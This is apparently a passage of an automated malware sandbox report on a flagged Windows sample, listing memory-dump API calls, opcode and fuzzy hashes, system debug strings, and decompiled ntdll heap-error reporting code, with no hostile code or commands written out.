                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 63b8ef6fadca6af7a99b0039086e13c07e1d873560098cc0129fd80580459090
                                                                    • Instruction ID: bc6151cd61c5060c008c967ca83ef6052e272a11ccf98d00745dfc333503cd5a
                                                                    • Opcode Fuzzy Hash: 63b8ef6fadca6af7a99b0039086e13c07e1d873560098cc0129fd80580459090
                                                                    • Instruction Fuzzy Hash: 279002B170100802D140719A44047460009A7D0345F51C012A5454555ECBA98DD576A6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 3d7d811828912933a61f0796c87fd03306c90e5d9a7eeb7c1561557d559227de
                                                                    • Instruction ID: 35f484ba2a69007cf2119bf5de76d9d72af46e27584b94fa702d725471f5c0e2
                                                                    • Opcode Fuzzy Hash: 3d7d811828912933a61f0796c87fd03306c90e5d9a7eeb7c1561557d559227de
                                                                    • Instruction Fuzzy Hash: 349002A1702004034105719A4414616400EA7E0245B51C022E1404591DCA7588917166
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 273b98960973de6e3274810f794e810ff8f267115b20bf12ba80a318fe4d8312
                                                                    • Instruction ID: b200047fc456d65fea7faa11cf6cb6e753ada24f2fe4dbf64d9509a81f7f1a52
                                                                    • Opcode Fuzzy Hash: 273b98960973de6e3274810f794e810ff8f267115b20bf12ba80a318fe4d8312
                                                                    • Instruction Fuzzy Hash: 849002A174100842D100619A4414B060009E7E1345F51C016E1454555DCB69CC527167
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 0bc433222301c4eb5f0a55f0490aaf6dffeee066129d31ed9c3d1ff117443498
                                                                    • Instruction ID: f37ce085e701edd0894eee248fa200d4fe9e246822e07db3aeafd287eb9ce3a0
                                                                    • Opcode Fuzzy Hash: 0bc433222301c4eb5f0a55f0490aaf6dffeee066129d31ed9c3d1ff117443498
                                                                    • Instruction Fuzzy Hash: 1C900261742045525545B19A4404507400AB7E0285791C013A1804951CCA769856E662
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 765cdadfae6779529f30d1ef333eec8d9b614506bf0fcf30dc8f9637efde2e1e
                                                                    • Instruction ID: 85974c54c8aa7302d6a063efdad1b2fd99d82516394c27686197ac2388a93f6d
                                                                    • Opcode Fuzzy Hash: 765cdadfae6779529f30d1ef333eec8d9b614506bf0fcf30dc8f9637efde2e1e
                                                                    • Instruction Fuzzy Hash: ED90027170100813D111619A4504707000DA7D0285F91C413A0814559DDBA68952B162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 0ef6f225b60efb5c27f078df9ed721a5fa37dad70a29923fc20dfa191b4f9a87
                                                                    • Instruction ID: dfb4790e3dfcfdaadeb06b177b591cf420df29fe47d9223d9c2bce0950b356da
                                                                    • Opcode Fuzzy Hash: 0ef6f225b60efb5c27f078df9ed721a5fa37dad70a29923fc20dfa191b4f9a87
                                                                    • Instruction Fuzzy Hash: 4D900261B0100902D101719A4404616000EA7D0285F91C023A1414556ECF758992B172
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 919db361839c7283b961dc20893fdeb236220b026bf4c67242d94481d6a6906d
                                                                    • Instruction ID: 3c21b096298113da3f600ce5f7832d727655afc20ff37c42dfe06327caa5fd3f
                                                                    • Opcode Fuzzy Hash: 919db361839c7283b961dc20893fdeb236220b026bf4c67242d94481d6a6906d
                                                                    • Instruction Fuzzy Hash: 7D90027170100802D10065DA54086460009A7E0345F51D012A5414556ECBB588917172
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: a2417fe76504b0fdc3144d406141f008a498f5d980f972869c7cfab4b3b53f89
                                                                    • Instruction ID: 2da7881ebe14bb094abdfabe9ce91b27fc50c1a813d84caa31e7f3da5077b1b8
                                                                    • Opcode Fuzzy Hash: a2417fe76504b0fdc3144d406141f008a498f5d980f972869c7cfab4b3b53f89
                                                                    • Instruction Fuzzy Hash: 8690027171114802D110619A84047060009A7D1245F51C412A0C14559DCBE588917163
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 1d0701652e589cef01a6a5b0834b534aeb0820379746d93f79bcc58559f42bdb
                                                                    • Instruction ID: cb04141586c5be046972351287e07a57a181b9b31302d282b389e0f282358e8d
                                                                    • Opcode Fuzzy Hash: 1d0701652e589cef01a6a5b0834b534aeb0820379746d93f79bcc58559f42bdb
                                                                    • Instruction Fuzzy Hash: DC90026971300402D180719A540860A0009A7D1246F91D416A0405559CCE6588696362
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: c24e25797a5aaf9783cdb84d7bd0a228a6217a5de0197aabd7bc8c18116c6bcc
                                                                    • Instruction ID: f85a82e543c53f19c64fb3e0f46d79c1c991ebc8e62b050bebfc9fcc98f6aa91
                                                                    • Opcode Fuzzy Hash: c24e25797a5aaf9783cdb84d7bd0a228a6217a5de0197aabd7bc8c18116c6bcc
                                                                    • Instruction Fuzzy Hash: F090026170100403D140719A54186064009F7E1345F51D012E0804555CDE6588566263
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: b9e975b2d333b0b6c20884e33d273eb288250906c3eb4e834e0b8f8fb03bf340
                                                                    • Instruction ID: 4afbf3bf635daec4128fd2034003d8557e9f1f95bb4308fb5e9cdec574f333f9
                                                                    • Opcode Fuzzy Hash: b9e975b2d333b0b6c20884e33d273eb288250906c3eb4e834e0b8f8fb03bf340
                                                                    • Instruction Fuzzy Hash: A890026171180442D20065AA4C14B070009A7D0347F51C116A0544555CCE6588616562
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: d4ff13e45342b5a1b8f2bbd80e4be0d123f7f95b57e971b42e5d3d364804e1c7
                                                                    • Instruction ID: ecff8c33947a2154d74f557b333e1a0029af85e7139962d4d3318d1a4e41b29f
                                                                    • Opcode Fuzzy Hash: d4ff13e45342b5a1b8f2bbd80e4be0d123f7f95b57e971b42e5d3d364804e1c7
                                                                    • Instruction Fuzzy Hash: 3B90027170100C02D180719A440464A0009A7D1345F91C016A0415655DCF658A5977E2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 63f7bb30f0782adda60074fd64a838d8ce59a94066292043782be27160081ee5
                                                                    • Instruction ID: 875e50270aabe396b8343472b5b90508b3ff5f0f6d4d8038d12458e0898d4a99
                                                                    • Opcode Fuzzy Hash: 63f7bb30f0782adda60074fd64a838d8ce59a94066292043782be27160081ee5
                                                                    • Instruction Fuzzy Hash: C490027170140802D100619A481470B0009A7D0346F51C012A1554556DCB75885175B2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 28fd277bd1287d029d8474af4e4f168da8f9096dca3200e21d1ddabd2aaa3e8a
                                                                    • Instruction ID: 8c43a569e6f2d803d4ca1888220c024f6b9fc80eebfe25833461b35df03d72a2
                                                                    • Opcode Fuzzy Hash: 28fd277bd1287d029d8474af4e4f168da8f9096dca3200e21d1ddabd2aaa3e8a
                                                                    • Instruction Fuzzy Hash: 97900261B0100442414071AA88449064009BBE1255751C122A0D88551DCAA9886566A6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: a97a25c2e77cabda2c762ded332e582d840dc70b4890ad31dfdd73d40b861070
                                                                    • Instruction ID: 5fecb1f53396ab3e2f13e96cc8244ec103583e1e0287140babae375673ce8b88
                                                                    • Opcode Fuzzy Hash: a97a25c2e77cabda2c762ded332e582d840dc70b4890ad31dfdd73d40b861070
                                                                    • Instruction Fuzzy Hash: BD90027170108C02D110619A840474A0009A7D0345F55C412A4814659DCBE588917162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                    • Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
                                                                    • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                    • Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                    • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heap$AllocateFree
                                                                    • String ID:
                                                                    • API String ID: 2488874121-0
                                                                    • Opcode ID: 6ff80dcb481a209e0d9783a40e1d31070ded238351805f17418e0a3198a2af03
                                                                    • Instruction ID: e35f81ec430e903478ed3fd621af9c9e9b745fbb59e88449a9a2cd6a7735a0b2
                                                                    • Opcode Fuzzy Hash: 6ff80dcb481a209e0d9783a40e1d31070ded238351805f17418e0a3198a2af03
                                                                    • Instruction Fuzzy Hash: A5F0C2B82087856FD710EF69EC808EB7795AF8531C754894EE88983303EA35D8568BB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                    • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                    • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                    • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                    • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                    • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                    • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                    • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                    • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                    • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                    • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                    • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 88bb45e7614d21acd51da27af976991c2a294defad2c4887a2bfd009b506f306
                                                                    • Instruction ID: e5e253baeb12525dde2dbbbf2885a3ae56325cda8349ec66a744d5e7f8c762a0
                                                                    • Opcode Fuzzy Hash: 88bb45e7614d21acd51da27af976991c2a294defad2c4887a2bfd009b506f306
                                                                    • Instruction Fuzzy Hash: 8CB09B71D014C5C5D751D7A54608717794477D0745F16C053D1460652F4778C095F5B6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Strings
                                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 014CB352
                                                                    • *** enter .cxr %p for the context, xrefs: 014CB50D
                                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 014CB3D6
                                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 014CB48F
                                                                    • <unknown>, xrefs: 014CB27E, 014CB2D1, 014CB350, 014CB399, 014CB417, 014CB48E
                                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 014CB2F3
                                                                    • Go determine why that thread has not released the critical section., xrefs: 014CB3C5
                                                                    • a NULL pointer, xrefs: 014CB4E0
                                                                    • *** enter .exr %p for the exception record, xrefs: 014CB4F1
                                                                    • The instruction at %p referenced memory at %p., xrefs: 014CB432
                                                                    • The resource is owned exclusively by thread %p, xrefs: 014CB374
                                                                    • The resource is owned shared by %d threads, xrefs: 014CB37E
                                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 014CB323
                                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 014CB314
                                                                    • The critical section is owned by thread %p., xrefs: 014CB3B9
                                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 014CB305
                                                                    • write to, xrefs: 014CB4A6
                                                                    • *** Inpage error in %ws:%s, xrefs: 014CB418
                                                                    • *** then kb to get the faulting stack, xrefs: 014CB51C
                                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 014CB53F
                                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 014CB2DC
                                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 014CB38F
                                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 014CB39B
                                                                    • read from, xrefs: 014CB4AD, 014CB4B2
                                                                    • This failed because of error %Ix., xrefs: 014CB446
                                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 014CB476
                                                                    • an invalid address, %p, xrefs: 014CB4CF
                                                                    • The instruction at %p tried to %s , xrefs: 014CB4B6
                                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 014CB484
                                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 014CB47D
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                    • API String ID: 0-108210295
                                                                    • Opcode ID: dc707d193df37e65d76ad71ee4edb252f5f7e72cab2b3123c2d106c25b36d28b
                                                                    • Instruction ID: 551d52b07b18e2c8958045428b3ae859bb2382961e2cf6fb210b721c1f93e8ff
                                                                    • Opcode Fuzzy Hash: dc707d193df37e65d76ad71ee4edb252f5f7e72cab2b3123c2d106c25b36d28b
                                                                    • Instruction Fuzzy Hash: 5C81F579A00210FBDB265A8B9C46D7F7F25EF76A95F41406FF5042F272E2718412C672
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 44%
                                                                    			E014D1C06() {
                                                                    				signed int _t27;
                                                                    				char* _t104;
                                                                    				char* _t105;
                                                                    				intOrPtr _t113;
                                                                    				intOrPtr _t115;
                                                                    				intOrPtr _t117;
                                                                    				intOrPtr _t119;
                                                                    				intOrPtr _t120;
                                                                    
                                                                    				_t105 = 0x13f48a4;
                                                                    				_t104 = "HEAP: ";
                                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    					_push(_t104);
                                                                    					E0141B150();
                                                                    				} else {
                                                                    					E0141B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    				}
                                                                    				_push( *0x150589c);
                                                                    				E0141B150("Heap error detected at %p (heap handle %p)\n",  *0x15058a0);
                                                                    				_t27 =  *0x1505898; // 0x0
                                                                    				if(_t27 <= 0xf) {
                                                                    					switch( *((intOrPtr*)(_t27 * 4 +  &M014D1E96))) {
                                                                    						case 0:
                                                                    							_t105 = "heap_failure_internal";
                                                                    							goto L21;
                                                                    						case 1:
                                                                    							goto L21;
                                                                    						case 2:
                                                                    							goto L21;
                                                                    						case 3:
                                                                    							goto L21;
                                                                    						case 4:
                                                                    							goto L21;
                                                                    						case 5:
                                                                    							goto L21;
                                                                    						case 6:
                                                                    							goto L21;
                                                                    						case 7:
                                                                    							goto L21;
                                                                    						case 8:
                                                                    							goto L21;
                                                                    						case 9:
                                                                    							goto L21;
                                                                    						case 0xa:
                                                                    							goto L21;
                                                                    						case 0xb:
                                                                    							goto L21;
                                                                    						case 0xc:
                                                                    							goto L21;
                                                                    						case 0xd:
                                                                    							goto L21;
                                                                    						case 0xe:
                                                                    							goto L21;
                                                                    						case 0xf:
                                                                    							goto L21;
                                                                    					}
                                                                    				}
                                                                    				L21:
                                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    					_push(_t104);
                                                                    					E0141B150();
                                                                    				} else {
                                                                    					E0141B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    				}
                                                                    				_push(_t105);
                                                                    				E0141B150("Error code: %d - %s\n",  *0x1505898);
                                                                    				_t113 =  *0x15058a4; // 0x0
                                                                    				if(_t113 != 0) {
                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    						_push(_t104);
                                                                    						E0141B150();
                                                                    					} else {
                                                                    						E0141B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    					}
                                                                    					E0141B150("Parameter1: %p\n",  *0x15058a4);
                                                                    				}
                                                                    				_t115 =  *0x15058a8; // 0x0
                                                                    				if(_t115 != 0) {
                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    						_push(_t104);
                                                                    						E0141B150();
                                                                    					} else {
                                                                    						E0141B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    					}
                                                                    					E0141B150("Parameter2: %p\n",  *0x15058a8);
                                                                    				}
                                                                    				_t117 =  *0x15058ac; // 0x0
                                                                    				if(_t117 != 0) {
                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    						_push(_t104);
                                                                    						E0141B150();
                                                                    					} else {
                                                                    						E0141B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    					}
                                                                    					E0141B150("Parameter3: %p\n",  *0x15058ac);
                                                                    				}
                                                                    				_t119 =  *0x15058b0; // 0x0
                                                                    				if(_t119 != 0) {
                                                                    					L41:
                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    						_push(_t104);
                                                                    						E0141B150();
                                                                    					} else {
                                                                    						E0141B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    					}
                                                                    					_push( *0x15058b4);
                                                                    					E0141B150("Last known valid blocks: before - %p, after - %p\n",  *0x15058b0);
                                                                    				} else {
                                                                    					_t120 =  *0x15058b4; // 0x0
                                                                    					if(_t120 != 0) {
                                                                    						goto L41;
                                                                    					}
                                                                    				}
                                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    					_push(_t104);
                                                                    					E0141B150();
                                                                    				} else {
                                                                    					E0141B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    				}
                                                                    				return E0141B150("Stack trace available at %p\n", 0x15058c0);
                                                                    			}











                                                                    0x014d1c10
                                                                    0x014d1c16
                                                                    0x014d1c1e
                                                                    0x014d1c3d
                                                                    0x014d1c3e
                                                                    0x014d1c20
                                                                    0x014d1c35
                                                                    0x014d1c3a
                                                                    0x014d1c44
                                                                    0x014d1c55
                                                                    0x014d1c5a
                                                                    0x014d1c65
                                                                    0x014d1c67
                                                                    0x00000000
                                                                    0x014d1c6e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
